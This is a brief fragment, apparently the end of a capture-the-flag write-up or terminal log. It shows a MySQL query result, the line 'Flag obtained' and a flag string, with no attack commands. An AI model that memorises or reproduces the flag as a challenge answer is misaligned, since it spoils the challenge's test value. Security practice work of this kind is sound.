1 row in set (0.00 sec)
mysql>
Flag obtained
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}
OVER
